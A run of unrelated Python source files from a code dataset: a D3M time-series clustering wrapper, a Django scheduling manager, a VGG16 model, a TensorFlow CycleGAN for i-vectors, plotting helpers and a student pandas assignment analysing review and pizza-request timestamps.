0)-> None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed)\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n \"\"\"\n Parameters\n ----------\n inputs : Input pandas frame where each row is a series. Series timestamps are store in the column names.\n\n Returns\n -------\n Outputs\n The output is a dataframe containing a single column where each entry is the associated series' cluster number.\n \"\"\"\n # setup model up\n sloth = Sloth()\n\n # set number of clusters for k-means\n if self.hyperparams['algorithm'] == 'TimeSeriesKMeans':\n # enforce default value\n if not self.hyperparams['nclusters']:\n nclusters = 4\n else:\n nclusters = self.hyperparams['nclusters']\n labels = sloth.ClusterSeriesKMeans(inputs.values, nclusters, 'TimeSeriesKMeans')\n elif self.hyperparams['algorithm'] == 'DBSCAN':\n # enforce default value\n if not self.hyperparams['eps']:\n nclusters = 0.5\n else:\n eps = self.hyperparams['eps']\n if not self.hyperparams['min_samples']:\n min_samples = 5\n else:\n min_samples = self.hyperparams['min_samples']\n SimilarityMatrix = sloth.GenerateSimilarityMatrix(inputs.values)\n nclusters, labels, cnt = sloth.ClusterSimilarityMatrix(SimilarityMatrix, eps, min_samples)\n elif self.hyperparams['algorithm'] == 'HDBSCAN':\n # enforce default value\n if not self.hyperparams['min_samples']:\n min_samples = 5\n else:\n min_samples = self.hyperparams['min_samples']\n SimilarityMatrix = sloth.GenerateSimilarityMatrix(inputs.values)\n nclusters, labels, cnt = sloth.HClusterSimilarityMatrix(SimilarityMatrix, min_samples)\n else:\n # enforce default value\n if not self.hyperparams['nclusters']:\n nclusters = 4\n else:\n nclusters = self.hyperparams['nclusters']\n labels = sloth.ClusterSeriesKMeans(inputs.values, nclusters, 'GlobalAlignmentKernelKMeans') \n\n # add metadata to output\n out_df_sloth = pandas.DataFrame(labels)\n out_df_sloth.columns = ['labels']\n\n # initialize the output dataframe as input dataframe (results will be appended to it)\n # 
out_df = d3m_DataFrame(inputs)\n\n sloth_df = d3m_DataFrame(out_df_sloth)\n # first column ('labels')\n col_dict = dict(sloth_df.metadata.query((metadata_base.ALL_ELEMENTS, 0)))\n col_dict['structural_type'] = type(\"1\")\n col_dict['name'] = 'labels'\n col_dict['semantic_types'] = ('http://schema.org/Integer', 'https://metadata.datadrivendiscovery.org/types/PredictedTarget')\n sloth_df.metadata = sloth_df.metadata.update((metadata_base.ALL_ELEMENTS, 0), col_dict)\n\n # concatentate final output frame -- not real consensus from program, so commenting out for now\n # out_df = utils_cp.append_columns(out_df, sloth_df)\n\n return CallResult(sloth_df)\n\nif __name__ == '__main__':\n # Load data and preprocessing\n input_dataset = container.Dataset.load('file:///data/home/jgleason/D3m/datasets/seed_datasets_current/66_chlorineConcentration/66_chlorineConcentration_dataset/datasetDoc.json')\n ds2df_client = DatasetToDataFrame(hyperparams = {\"dataframe_resource\":\"1\"})\n df = d3m_DataFrame(ds2df_client.produce(inputs = input_dataset).value) \n ts_loader = TimeSeriesLoaderPrimitive(hyperparams = {\"time_col_index\":0, \"value_col_index\":1,\"file_col_index\":1})\n metadata_dict = dict(df.metadata.query_column(ts_loader.hyperparams['file_col_index']))\n metadata_dict['semantic_types'] = ('https://metadata.datadrivendiscovery.org/types/FileName', 'https://metadata.datadrivendiscovery.org/types/Timeseries')\n metadata_dict['media_types'] = ('text/csv',)\n metadata_dict['location_base_uris'] = ('file:///data/home/jgleason/D3m/datasets/seed_datasets_current/66_chlorineConcentration/66_chlorineConcentration_dataset/timeseries/',)\n df.metadata = df.metadata.update_column(ts_loader.hyperparams['file_col_index'], metadata_dict)\n ts_values = ts_loader.produce(inputs = df)\t \n\n #storc_client = Storc(hyperparams={'algorithm':'GlobalAlignmentKernelKMeans','nclusters':4})\n storc_client = Storc(hyperparams={'algorithm':'DBSCAN','eps':0.5, 'min_samples':5})\n #frame = pandas.read_csv(\"path/csv_containing_one_series_per_row.csv\",dtype=str)\n result = storc_client.produce(inputs = ts_values.value.head(100))\n print(result.value)\n","sub_path":"SlothD3MWrapper/Storc.py","file_name":"Storc.py","file_ext":"py","file_size_in_byte":8971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"603852716","text":"from django.db import models\nfrom datetime import date, datetime\nfrom django.utils import timezone\nfrom django.db.models import Q\n\nclass AgendaCustomManager(models.Manager):\n def disponiveis(self):\n return super().get_queryset().filter(dia__gte=date.today()).order_by('dia')\n\nclass HorarioCustomManager(models.Manager):\n def disponiveis(self):\n hora_atual = timezone.localtime(timezone.now()).time()\n hora_padrao = datetime.strptime('00:00', '%H:%M')\n \n return super().get_queryset().filter(\n (\n Q(agenda__dia=date.today(), \n hora__gt= hora_atual) \n | Q(agenda__dia__gt=date.today(),\n hora__gte=hora_padrao)\n ), \n marcado=False\n ).order_by('hora')\n \n","sub_path":"backend/agenda/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"317283374","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport torchvision\nfrom torchvision.utils 
import make_grid\n\nclass VGG(nn.Module):\n def __init__(self, in_channels = 3, hidden_channels = 64):\n super(VGG, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, hidden_channels, kernel_size = 3, stride = 1, padding = 1)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(hidden_channels, hidden_channels, kernel_size = 3, stride = 1, padding = 1)\n self.relu2 = nn.ReLU()\n self.maxpool1 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv3 = nn.Conv2d(hidden_channels, hidden_channels*2, kernel_size = 3, stride = 1, padding = 1)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(hidden_channels*2, hidden_channels*2, kernel_size = 3, stride = 1, padding = 1)\n self.relu4 = nn.ReLU()\n self.maxpool2 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv5 = nn.Conv2d(hidden_channels*2, hidden_channels*4, kernel_size = 3, stride = 1, padding = 1)\n self.relu5 = nn.ReLU()\n self.conv6 = nn.Conv2d(hidden_channels*4, hidden_channels*4, kernel_size = 3, stride = 1, padding = 1)\n self.relu6 = nn.ReLU()\n self.conv7 = nn.Conv2d(hidden_channels*4, hidden_channels*4, kernel_size = 3, stride = 1, padding = 1)\n self.relu7 = nn.ReLU()\n self.maxpool3 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv8 = nn.Conv2d(hidden_channels*4, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu8 = nn.ReLU()\n self.conv9 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu9 = nn.ReLU()\n self.conv10 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu10 = nn.ReLU()\n self.maxpool4 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.conv11 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu11 = nn.ReLU()\n self.conv12 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu12 = nn.ReLU()\n self.conv13 = nn.Conv2d(hidden_channels*8, hidden_channels*8, kernel_size = 3, stride = 1, padding = 1)\n self.relu13 = nn.ReLU()\n self.maxpool5 = nn.MaxPool2d(kernel_size = 2, stride = 2)\n self.linear1 = nn.Linear(512*7*7, 4096)\n self.relu14 = nn.ReLU()\n self.dropout1 = nn.Dropout(0.5)\n self.linear2 = nn.Linear(4096, 4096)\n self.relu15 = nn.ReLU()\n self.dropout2 = nn.Dropout(0.5)\n self.linear3 = nn.Linear(4096, 1000)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.conv2(x)\n x = self.relu2(x)\n x = self.maxpool1(x)\n x = self.conv3(x)\n x = self.relu3(x)\n x = self.conv4(x)\n x = self.relu4(x)\n x = self.maxpool2(x) \n x = self.conv5(x)\n x = self.relu5(x)\n x = self.conv6(x)\n x = self.relu6(x)\n x = self.conv7(x)\n x = self.relu7(x)\n x = self.maxpool3(x) \n x = self.conv8(x)\n x = self.relu8(x)\n x = self.conv9(x)\n x = self.relu9(x)\n x = self.conv10(x)\n x = self.relu10(x)\n x = self.maxpool4(x) \n x = self.conv11(x)\n x = self.relu11(x)\n x = self.conv12(x)\n x = self.relu12(x)\n x = self.conv13(x)\n x = self.relu13(x)\n x = self.maxpool5(x)\n x = x.reshape(x.shape[0], -1)\n x = self.linear1(x)\n x = self.relu14(x)\n x = self.dropout1(x)\n x = self.linear2(x)\n x = self.relu15(x)\n x = self.dropout2(x)\n x = self.linear3(x)\n return x\n\n\nif __name__ == \"__main__\":\n device = 'cpu'\n vgg_model = VGG()\n #print(vgg_model)\n x = torch.randn(10, 3, 224, 224).to(device)\n 
print(vgg_model(x).shape)\n\n","sub_path":"VGG_16.py","file_name":"VGG_16.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"308159220","text":"\nprint(\"*\\n**\\n***\\n****\\nDo you want to print this pattern\\nIf yes then enter 1 else 0\")\na=int(input())\nb=bool(a)\nprint(\"enter number of lines you want to print this pattern\")\nn=int(input())\nif(b==True):\n i=0\n while(i0):\n j=i\n while(j>0):\n print(\"*\",end=\"\")\n j-=1\n print()\n i-=1","sub_path":"pattern1.py","file_name":"pattern1.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"88541376","text":"\r\nimport tornado.web\r\n\r\nfrom abase.basehandler.handlertools import localhandlers\r\nfrom tornas import settings\r\ntemplate_path=settings.TEMPLATES_PATH,\r\nstatic_path=settings.STATIC_PATH\r\n\r\n\r\nclass Applications(tornado.web.Application):\r\n\r\n def __init__(self):\r\n handlers = localhandlers()\r\n settings = dict(\r\n template_path=template_path,\r\n static_path=static_path\r\n )\r\n\r\n tornado.web.Application.__init__(self, handlers, **settings)\r\n\r\n\r\n\r\n\r\n","sub_path":"abase/basehandler/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"619821979","text":"# compute df/f from raw F data\n#\n# Ziqiang Wei\n#\n# weiz@janelia.hhmi.org\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\n\nskip_interval = 3.0 # ignore F after a spike (< interval_pre sec) while computing baseline\n\n\ndef get_baseline_corr_dff(fmean, spktimes, ca_time, interval=skip_interval):\n fmeanSkipSpk = np.copy(fmean)\n for n_spk in spktimes:\n skip_frame = np.logical_and(ca_time >= n_spk, ca_time <= n_spk + interval)\n fmeanSkipSpk[skip_frame] = np.nan\n frameNoSpk = np.logical_not(np.isnan(fmeanSkipSpk))\n # baseline = interp1d(ca_time[frameNoSpk], fmean[frameNoSpk], kind='linear')\n # 'cubic' interp1d behaves different in scipy from that in matlab, probably the num is different by default\n # f_baseline = baseline(ca_time)\n f_baseline = fmean[frameNoSpk].mean()\n dff = (fmean - f_baseline) / f_baseline\n return dff\n","sub_path":"get_baseline_corr_dff.py","file_name":"get_baseline_corr_dff.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"192860677","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef plot_setup():\n\n # make figs directory\n if not os.path.isdir('figs'):\n os.mkdir('figs')\n \n # set plot fonts\n myfont = {'family' : 'arial',\n 'weight' : 'normal',\n 'size' : 14}\n plt.rc('font', **myfont)\n\ndef plot_eigenvalues(e,e_br=None,out_label=None):\n \n plot_setup() \n k = e.shape[0]\n if out_label is None:\n out_label = 'Output'\n \n plt.figure()\n plt.semilogy(range(1,k+1),e,'ko-')\n if e_br is not None:\n plt.fill_between(range(1,k+1),e_br[:,0],e_br[:,1],\n facecolor='0.7', interpolate=True)\n plt.xlabel('Index')\n plt.ylabel('Eigenvalues')\n plt.title(out_label)\n plt.grid(True)\n plt.xticks(range(1,k+1))\n if e_br is None:\n plt.axis([1,k,np.amin(e),np.amax(e)])\n else:\n plt.axis([1,k,np.amin(e_br[:,0]),np.amax(e_br[:,1])])\n figname = 'figs/evals_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n plt.show()\n \ndef 
plot_subspace_errors(sub_br,out_label=None):\n \n plot_setup()\n kk = sub_br.shape[0]\n if out_label is None:\n out_label = 'Output'\n \n plt.figure()\n plt.semilogy(range(1,kk+1),sub_br[:,1],'ko-',markersize=12)\n plt.fill_between(range(1,kk+1),sub_br[:,0],sub_br[:,2],\n facecolor='0.7', interpolate=True)\n plt.xlabel('Subspace dimension')\n plt.ylabel('Subspace distance')\n plt.grid(True)\n plt.xticks(range(1,kk+1))\n plt.axis([1,kk,np.amin(sub_br[:,0]),1])\n figname = 'figs/subspace_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n plt.show()\n \ndef plot_eigenvectors(W,W_boot=None,in_labels=None,out_label=None):\n \n plot_setup()\n n = len(W.shape)\n m = W.shape[0]\n # set labels for plots\n if in_labels is None:\n in_labels = [str(i) for i in range(1,m+1)]\n if out_label is None:\n out_label = 'Output'\n \n if n==1:\n plt.figure()\n if W_boot is not None:\n plt.plot(range(1,m+1),W_boot,color='0.7')\n plt.plot(range(1,m+1),W,'ko-',markersize=12)\n plt.xlabel('Variable')\n plt.ylabel('Weights')\n plt.grid(True)\n if m<=10:\n plt.xticks(range(1,m+1),in_labels,rotation='vertical')\n plt.margins(0.2)\n plt.subplots_adjust(bottom=0.15)\n plt.axis([1,m,-1,1])\n figname = 'figs/evecs_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n else:\n plt.figure()\n for k in range(np.minimum(3,W.shape[1])):\n plt.plot(range(1,m+1),W[:,k],'bo-',markersize=12,label='%d' % k)\n plt.xlabel('Variable')\n plt.ylabel('Eigenvectors')\n plt.grid(True)\n if m<=10:\n plt.xticks(range(1,m+1),in_labels,rotation='vertical')\n plt.margins(0.2)\n plt.subplots_adjust(bottom=0.15)\n plt.axis([1,m,-1,1])\n plt.legend(loc='best')\n figname = 'figs/evecs_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n \n plt.show()\n\ndef sufficient_summary_plot(y,f,out_label=None):\n \n plot_setup()\n \n # check sizes of y\n n = len(y.shape) \n if n == 1:\n y1 = y\n else:\n y1 = y[:,0]\n y2 = y[:,1]\n \n # set labels for plots\n if out_label is None:\n out_label = 'Output'\n \n plt.figure()\n plt.plot(y1,f,'bo',markersize=12)\n plt.xlabel('Active variable')\n plt.ylabel(out_label)\n plt.grid(True)\n figname = 'figs/ssp1_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n \n if n==2:\n \n plt.figure()\n plt.scatter(y1,y2,c=f,s=150.0,vmin=np.min(f),vmax=np.max(f))\n plt.xlabel('Active variable 1')\n plt.ylabel('Active variable 2')\n plt.title(out_label)\n figname = 'figs/ssp2_' + out_label + '.eps'\n plt.savefig(figname, dpi=300, bbox_inches='tight', pad_inches=0.0)\n \n plt.show()\n ","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"404515059","text":"import tensorflow as tf\nimport tflearn\n\nfrom tflearn.layers.core import input_data, dropout, fully_connected \nfrom tflearn.layers.conv import conv_2d,conv_2d_transpose, max_pool_2d\nfrom tflearn.layers.normalization import batch_normalization \nfrom tflearn.layers.estimator import regression\n\nimport ResBlock_LRelu\n\n# The number of samples per batch.\nBATCH_SIZE = 1\n\n# The height of each i-vector.\nIVEC_HEIGHT = 1\n\n# The length of each i-vector.\nIVEC_DIM = 600\n\n# The number of color channels per image.\nIVEC_CHANNELS = 1\n\nPOOL_SIZE = 50\n\ndef get_outputs(inputs, network=\"tensorflow\"):\n ivec_a = inputs['ivec_a']\n ivec_b = inputs['ivec_b']\n\n fake_pool_a = 
inputs['fake_a']\n fake_pool_b = inputs['fake_b']\n\n with tf.variable_scope(\"Model\") as scope:\n\n if network == \"tensorflow\":\n current_discriminator = build_discriminator_tfl\n current_generator = build_generator_tfl\n else:\n raise ValueError(\n 'network must be tensorflow'\n )\n\n prob_real_a_is_real = current_discriminator(ivec_a, \"d_A\")\n prob_real_b_is_real = current_discriminator(ivec_b, \"d_B\")\n\n fake_ivec_b = current_generator(ivec_a, name=\"g_A\")\n fake_ivec_a = current_generator(ivec_b, name=\"g_B\")\n #print ('ivec_b: ', ivec_b)\n #print ('fake_ivec_a: ', fake_ivec_a)\n\n scope.reuse_variables()\n\n prob_fake_a_is_real = current_discriminator(fake_ivec_a, \"d_A\")\n prob_fake_b_is_real = current_discriminator(fake_ivec_b, \"d_B\")\n\n # \"cycle_ivec_a\" means: A -> Fake_B -> \"Fake_A\"\n cycle_ivec_a = current_generator(fake_ivec_b, name=\"g_B\")\n cycle_ivec_b = current_generator(fake_ivec_a, name=\"g_A\")\n\n scope.reuse_variables()\n\n prob_fake_pool_a_is_real = current_discriminator(fake_pool_a, \"d_A\")\n prob_fake_pool_b_is_real = current_discriminator(fake_pool_b, \"d_B\")\n\n return {\n 'prob_real_a_is_real': prob_real_a_is_real,\n 'prob_real_b_is_real': prob_real_b_is_real,\n 'prob_fake_a_is_real': prob_fake_a_is_real,\n 'prob_fake_b_is_real': prob_fake_b_is_real,\n 'prob_fake_pool_a_is_real': prob_fake_pool_a_is_real,\n 'prob_fake_pool_b_is_real': prob_fake_pool_b_is_real,\n 'cycle_ivec_a': cycle_ivec_a,\n 'cycle_ivec_b': cycle_ivec_b,\n 'fake_ivec_a': fake_ivec_a,\n 'fake_ivec_b': fake_ivec_b,\n }\n\n\ndef build_generator_tfl(inputgen, name=\"generator\"):\n with tf.variable_scope(name):\n # downsampling\n inputgen = tf.reshape(inputgen, [1, 1, IVEC_DIM, 1])\n # conv layer 1\n g_cnn = conv_2d(inputgen, 32, [1, 3], strides=1)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # conv layer 2\n g_cnn = conv_2d(g_cnn, 64, [1, 3], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # conv layer 3\n g_cnn = conv_2d(g_cnn, 128, [1, 3], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n # res_net with 6 blocks\n # modified to use Leaky Relu activation, alpha=0.2\n g_cnn = ResBlock_LRelu.residual_block_LRelu(g_cnn, 6, 128)\n\n # upsampling\n # deconv layer 1\n g_cnn = conv_2d_transpose(g_cnn, 64, [1, 3], output_shape=[1, 300, 64], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # deconv layer 2\n g_cnn = conv_2d_transpose(g_cnn, 32, [1, 3], output_shape=[1, 600, 32], strides=[1, 2])\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n #output layer\n g_cnn = conv_2d(g_cnn, 1, [1, 3], strides=1)\n g_cnn = tf.reshape(g_cnn, [1, IVEC_DIM])\n \n return g_cnn\n\n\ndef build_discriminator_tfl(inputdisc, name=\"discriminator\"):\n with tf.variable_scope(name):\n inputdisc = tf.reshape(inputdisc, [1, 1, IVEC_DIM, 1])\n # conv layer 1\n d_cnn = conv_2d(inputdisc, 64, [1, 3], strides=1)\n #d_cnn = batch_normalization(d_cnn)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # conv layer 2\n d_cnn = conv_2d(d_cnn, 128, [1, 3], strides=[1, 2])\n #d_cnn = batch_normalization(d_cnn)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # fully connected layer 1\n d_cnn = fully_connected(d_cnn, 512)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # fully connected layer 1\n d_cnn = fully_connected(d_cnn, 
512)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n #output layer\n #d_cnn = fully_connected(d_cnn, 1, activation='sigmoid')\n d_cnn = fully_connected(d_cnn, 1)\n \n return d_cnn\n\ninput_a = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"input_A\")\ninput_b = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"input_B\")\nfake_A = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"fake_A\")\nfake_B = tf.placeholder(tf.float32, [BATCH_SIZE, IVEC_DIM], name=\"fake_B\")\n\ninputs = {\n 'ivec_a': input_a,\n 'ivec_b': input_b,\n 'fake_a': fake_A,\n 'fake_b': fake_B,\n}\n\noutputs = get_outputs(inputs)\n\nfake_ivec_a = outputs['fake_ivec_a']\n\nprint (fake_ivec_a)\n\n'''\ntf_x = tf.placeholder(tf.float32, [1, 1, IVEC_DIM, 1]) # (batch, height, width, channel)\noutput = tf.placeholder(tf.float32, [1, 1, IVEC_DIM, 1])\n\n# downsampling\n#inputgen = tf.reshape(tf_x, [1, 1, IVEC_DIM, 1])\n# conv layer 1\ng_cnn = conv_2d(tf_x, 32, [1, 7], strides=1)\nprint (g_cnn)\ng_cnn = batch_normalization(g_cnn)\ng_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n# conv layer 2\ng_cnn = conv_2d(g_cnn, 64, [1, 5], strides=1)\nprint (g_cnn)\ng_cnn = batch_normalization(g_cnn)\ng_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\nconv1 = tf.layers.conv2d( # shape (1, 1, 600, 1)\n inputs=tf_x,\n filters=64,\n kernel_size=[1, 7],\n strides=1,\n padding='same',\n activation=tf.nn.leaky_relu\n) # -> (1, 600, 64)\npool1 = tf.layers.max_pooling2d(\n conv1,\n pool_size=[1, 2],\n strides=2,\n) # -> (14, 14, 16)\n\nconv2 = tf.layers.conv2d(pool1, 64, [1, 5], 1, 'same', activation=tf.nn.leaky_relu) # -> (14, 14, 32)\npool2 = tf.layers.max_pooling2d(conv2, [1, 2], 2) # -> (7, 7, 32)\n\nconv3 = tf.layers.conv2d(pool2, 64, [1, 3], 1, 'same', activation=tf.nn.leaky_relu) # -> (14, 14, 32)\npool3 = tf.layers.max_pooling2d(conv3, [1, 2], 2) # -> (7, 7, 32)\nprint (pool3)\n\nflat = tf.reshape(pool3, [1, 1*75*64]) # -> (1*75*384, )\nprint (flat)\nOut_disc = tf.layers.dense(flat, 600, activation=tf.nn.sigmoid) # output layer\nprint (Out_disc)\n'''","sub_path":"tftest2.py","file_name":"tftest2.py","file_ext":"py","file_size_in_byte":6784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371224882","text":"## File: ds4ua-assignment-8-solns.py\n## Topic: Assignment 8 Solutions\n## Name: David Smith\n## Section Time: 5:00-6:15\n## Grading Group: 5\n\n\nimport pandas as pd # Load pandas as pd\nreviews = pd.read_csv('reviews.txt', \n sep='\\t',\n header=None,\n names=['Reviewer','Movie','Rating','Date'])\n# Read in the DataFrame\n\n## 1a.\n\noldest_date = reviews['Date'].min() # Get the UTC for the oldest date\nnewest_date = reviews['Date'].max() # Get the UTC for the newest date\nod = pd.to_datetime(oldest_date, unit='s') # Convert the UTC for the oldest date\n# to a datetime object\nnd = pd.to_datetime(newest_date, unit='s') # Convert the UTC for the newest date\n# to a datetime object\nprint('The date and time of the oldest review is', od)\nprint('The date and time of the most recent review is', nd)\n\n\"\"\"\n# 1a\nThe date and time of the oldest review is 1997-09-20 03:05:10\nThe date and time of the most recent review is 1998-04-22 23:10:38\n\"\"\"\n\n## 1b.\n\nformat = \"%A %B %d %Y %H:%M:%S\" # Create a format string for the output\nmedian_date = reviews['Date'].median() # Get the median UTC\nmd = pd.to_datetime(median_date, unit='s') # Convert the median UTC to a datetime object\nprint('The median date and time for the 
reviews is', md.strftime(format))\n# Print the median datetime as a formatted string\n\n\"\"\"\n# 1b\nThe median date and time for the reviews is Monday December 22 1997 21:42:24\n\"\"\"\n\n## 1c.\n\ndates = pd.to_datetime(reviews['Date'], unit='s') # Get a Series of datetime objects\n# for all of the UTC codes\nreviews['Month'] = dates.dt.month # Add a column called 'Dates' to the DataFrame\n# consisiting of the months for each review\nmonth_gp = reviews['Rating'].groupby(reviews['Month']) # Group the ratings by the\n# months that they occurred in\nmonth_gp.mean() # Calculate and print the average rating for each month\n\n\"\"\"\n# 1c\nMonth\n1 3.397730\n2 3.455009\n3 3.548831\n4 3.574848\n9 3.540125\n10 3.591421\n11 3.559842\n12 3.580388\nName: Rating, dtype: float64\n\"\"\"\n\n## 1d.\n\nreviews['DayOfWeek'] = dates.dt.strftime('%A') # Add a column called 'DayOfWeek' to\n# the DataFrame consisting of the day of the week for each review\nweek_gp = reviews['Rating'].groupby(reviews['DayOfWeek']) # Group the ratings by\n# the day of the week each occurred\nweek_gp.count().sort_values(ascending=False).index[0] # Count the number of ratings\n# for each day of the week, and report the day of the week that had the highest number\n# of ratings\n\n\"\"\"\n# 1d\n'Wednesday'\n\"\"\"\n\n## 1e.\n\nreviewer_gp = reviews['Date'].groupby(reviews['Reviewer']) # Group the dates by\n# each reviewer\nfive_reviewers = reviewer_gp.count().sort_values(ascending=False).index[0:5]\n# Get the five reviewers who had the most reviews\nfor rev in five_reviewers:# For each of the top 5 reviewers, do the following:\n rev_dates = reviews[reviews['Reviewer'] == rev] # Get the dates for the reviewer\n rev_first = rev_dates['Date'].min() # get the date of the first review for the reviewer\n rf = pd.to_datetime(rev_first, unit='s') # Convert the UTC to a datetime object\n print('The first review of reviewer', rev, 'was on', rf)\n\n\"\"\"\n# 1e\nThe first review of reviewer 405 was on 1998-01-23 08:37:15\nThe first review of reviewer 655 was on 1998-02-14 02:52:00\nThe first review of reviewer 13 was on 1997-12-07 17:11:23\nThe first review of reviewer 450 was on 1997-12-15 19:53:37\nThe first review of reviewer 276 was on 1997-09-20 20:12:17\n\"\"\"\n\nlines = pd.Series(open('pizza_requests.txt').read().splitlines())\n\n## 2a.\n\nutc = pd.DataFrame(lines[lines.str.contains('unix_timestamp_of_request_utc')].str.split().str[1],\n columns = ['Date']) # Create a DataFrame with a 'Date' column\n # consisting of the UTC codes\noldest_date = utc['Date'].min() # Get the UTC for the oldest date\nnewest_date = utc['Date'].max() # Get the UTC for the newest date\nod = pd.to_datetime(oldest_date, unit='s') # Convert the UTC for the oldest date\n# to a datetime object\nnd = pd.to_datetime(newest_date, unit='s') # Convert the UTC for the newest date\n# to a datetime object\nprint('The date and time of the oldest request is', od)\nprint('The date and time of the most recent request is', nd)\n\n\"\"\"\n# 2a\nThe date and time of the oldest request is 2011-02-14 22:28:57\nThe date and time of the most recent request is 2013-10-12 01:30:36\n\"\"\"\n\n## 2b.\n\nmedian_date = utc['Date'].median() # Get the median UTC\nmd = pd.to_datetime(median_date, unit='s') # Convert the median UTC to a datetime object\nprint('The median date and time for the reviews is', md.strftime(format))\n# Print the median datetime as a formatted string\n\n\"\"\"\n# 2b\nThe median date and time for the reviews is Friday July 20 2012 17:54:08\n\"\"\"\n\n## 
2c.\n\ndates = pd.to_datetime(utc['Date'], unit='s') # Convert the column of UTC codes to a\n# Series of datetime objects\nutc['Hour'] = dates.dt.hour # Add a column called 'Hour' to the DataFrame consisting\n# of the hour each request occurred\nhour_gp = utc['Date'].groupby(utc['Hour']) # Group the dates by the hour each occurred\nhour_gp.count().sort_values(ascending=False).iloc[0:5] # Report the five one-hour periods\n# with the most requests\n\n\"\"\"\n# 2c\nHour\n0 508\n22 497\n23 491\n21 464\n1 441\nName: Date, dtype: int64\n\"\"\"\n\n## 2d.\n\npizza = lines[lines.str.contains('requester_received_pizza')].str.split().str[1]\n# Get the 'true' or 'false' indicators of whether a user received pizza\nutc['Pizza'] = pizza.values # Add those indicators in a new column of the DateFrame\n# called \"Pizza'\n\ndef prop(x): # A function that returns the proportion of successful pizza requests in\n# a DataFrame\n pro = x['Pizza'].loc[x['Pizza'].values == 'true'].count() / x['Pizza'].count()\n # Calculate the proportion of successful pizza requests in DataFrame x\n return pro # Return the proportion\n\nprop_gp = utc.groupby(utc['Hour']) # Group the DataFrame by hour\nprops = prop_gp.apply(prop) # Apply the function prop to each hour to get the proportion\n# of successful pizza requests for each hour\nhigh_prop = props.sort_values(ascending=False).index[0] # Get the hour that has the\n# highest proportion of successful pizza requests\nprint('Hour %d had the highest proportion of successful pizza requests.' % high_prop)\n\n\"\"\"\n# 2d\nHour 13 had the highest proportion of successful pizza requests.\n\"\"\"\n\n## 2e.\n\nlow_prop = props.sort_values().index[0] # Get the hour that has the lowest proportion\n# of successful pizza requests\nprint('Hour %d had the lowest proportion of successful pizza requests.' 
